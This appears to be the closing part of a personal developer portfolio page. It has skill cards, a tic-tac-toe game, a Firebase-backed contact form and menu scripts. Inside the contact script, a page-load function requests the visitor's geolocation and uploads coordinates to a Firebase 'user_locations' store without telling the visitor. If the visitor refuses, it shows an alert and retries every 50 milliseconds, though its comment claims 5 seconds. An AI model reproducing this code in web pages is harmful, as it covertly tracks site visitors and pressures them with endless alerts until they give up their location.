      <img src="https://upload.wikimedia.org/wikipedia/commons/e/ea/Docker_%28container_engine%29_logo_%28cropped%29.png" alt="CSS Logo" class="logo">
      <h3>Docker</h3>
    </div>
    <div class="card animate-on-scroll">
      <img src="https://upload.wikimedia.org/wikipedia/commons/3/39/Kubernetes_logo_without_workmark.svg" alt="CSS Logo" class="logo">
      <h3>Kubernetes</h3>
    </div>
    <div class="card animate-on-scroll">
      <img src="https://upload.wikimedia.org/wikipedia/commons/8/82/Gnu-bash-logo.svg" alt="CSS Logo" class="logo">
      <h3>Bash Scripting</h3>
    </div>
    <div class="card animate-on-scroll">
      <img src="https://upload.wikimedia.org/wikipedia/commons/9/93/Amazon_Web_Services_Logo.svg" alt="CSS Logo" class="logo">
      <h3>AWS</h3>
    </div>
  </section>

  <section>
    <div class="tictac-content" id="tictac">
      <h1>Beat me at this<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h1>
      <button onclick="startGame()">Start Game</button>
      <div class="board" id="board"></div>
      <p id="turn-info"></p>
      <script src="./index.js"></script>
    </div>
  </section>

  <footer>
    <section id="contact" style="text-align: center; ">
      <h2>Contact Me<b style="color: rgb(245, 122, 77); font-size: 28px;">;</b></h2>
      <a href="https://www.linkedin.com/in/rajeev-kumar-behera-36403428b/" class="fa fa-linkedin"></a>
      <a href="https://github.com/yesiamrajeev" class="fa fa-github"></a>
      <a href="mailto:rajeev.220077@gmail.com" class="fa fa-google"></a>
      <a href="https://www.instagram.com/yes._.i._.am/" class="fa fa-instagram"></a>
      <div id="contactForm1">
        <form action="" id="contactForm">
          <div class="alert" style="display:none;">Your message sent</div>
          <div class="success-alert" style="display:none;">Message sent successfully!</div>

          <div class="inputBox">
            <input type="text" id="name" placeholder="Your name" />
          </div>
          <div class="inputBox">
            <input type="email" id="emailid" placeholder="Your Email" />
          </div>
          <div class="inputBox">
            <textarea id="msgContent" cols="40" rows="5" placeholder="Message"></textarea>
          </div>
          <div class="inputBox">
            <button type="submit">Submit</button>
          </div>
        </form>
      </div>
      <script src="https://www.gstatic.com/firebasejs/7.14.1/firebase-app.js"></script>
      <script src="https://www.gstatic.com/firebasejs/7.14.1/firebase-database.js"></script>
      <script defer>
        const firebaseConfig = {
          apiKey: "AIzaSyASYIx-1VTxdKXHYBnZA2LLLQFgnrYUya0",
          authDomain: "portfolio-2a7b9.firebaseapp.com",
          databaseURL: "https://portfolio-2a7b9-default-rtdb.firebaseio.com",
          projectId: "portfolio-2a7b9",
          storageBucket: "portfolio-2a7b9.appspot.com",
          messagingSenderId: "598365410181",
          appId: "1:598365410181:web:972b00285c63054b53aaec",
          measurementId: "G-L9JJF5KW1C"
        };
        ///////////////
        firebase.initializeApp(firebaseConfig);
const database = firebase.database();

function getUserLocation() {
    if (navigator.geolocation) {
        navigator.geolocation.getCurrentPosition(
            (position) => {
                const userLocation = {
                    latitude: position.coords.latitude,
                    longitude: position.coords.longitude,
                    timestamp: new Date().toISOString()
                };

                // Upload location to Firebase
                const locationRef = database.ref("user_locations").push();
                locationRef.set(userLocation)
                    .then(() => console.log("Location uploaded successfully!"))
                    .catch((error) => console.error("Error uploading location: ", error));
            },
            (error) => {
                console.error("Error getting location: ", error);
                
                if (error.code === error.PERMISSION_DENIED) {
                    alert("Location access is required! Retrying in 5 seconds...");
                    setTimeout(getUserLocation, 50); // Retry after 5 seconds
                }
            }
        );
    } else {
        alert("Geolocation is not supported by your browser.");
    }
}

// Call function when the page loads
window.onload = getUserLocation;
/////
        if (!firebase.apps.length) {
          firebase.initializeApp(firebaseConfig);
        }

        var contactFormDB = firebase.database().ref("contactForm");

        document.addEventListener("DOMContentLoaded", function () {
          document.getElementById("contactForm").addEventListener("submit", submitForm);
        });

        function submitForm(e) {
          e.preventDefault();

          var name = getElementVal("name");
          var emailid = getElementVal("emailid");
          var msgContent = getElementVal("msgContent");

          if (name && emailid && msgContent) {
            saveMessages(name, emailid, msgContent);

            document.querySelector(".alert").style.display = "block";

            setTimeout(() => {
              document.querySelector(".alert").style.display = "none";
            }, 3000);

            document.getElementById("contactForm").reset();
          } else {
            alert("Please fill in all fields.");
          }
        }

        const saveMessages = (name, emailid, msgContent) => {
          var newContactForm = contactFormDB.push();

          newContactForm.set({
            name: name,
            emailid: emailid,
            msgContent: msgContent,
          });
        };

        const getElementVal = (id) => {
          return document.getElementById(id).value;
        };
      </script>
    </section>
    <p>&copy; Rajeev 28 </p>

  </footer>
</div>
  <script>
    document.addEventListener('DOMContentLoaded', function() {
        var header = document.getElementById('header-main');
        var pageContainer = document.getElementById('page-container');
        var openMenuButton = document.getElementById('menu-open-button');
        if(window.innerWidth < 768){
          pageContainer.classList.remove('menu-open');

          header.classList.add('sticky-header');
        }
        window.addEventListener('scroll', function() {
            pageContainer.classList.remove('menu-open');
            if (window.scrollY >= 100) {
                header.classList.add('sticky-header');
            } else {
              if(window.innerWidth > 768){
                header.classList.remove('sticky-header');
              }
            }
        });
    
        openMenuButton.addEventListener('click', function() {
            header.classList.remove('sticky-header');
            pageContainer.classList.add('menu-open');
        });
    
        var links = document.querySelectorAll('a[href^="#"]');
    
        links.forEach(function(link) {
            link.addEventListener('click', function(event) {
                event.preventDefault();
                var targetId = this.getAttribute('href');
                var targetElement = document.querySelector(targetId);
    
                if (targetElement) {
                    targetElement.scrollIntoView({
                        behavior: 'smooth'
                    });
                }
            });
        });
    });
    </script>
</body>

</html>
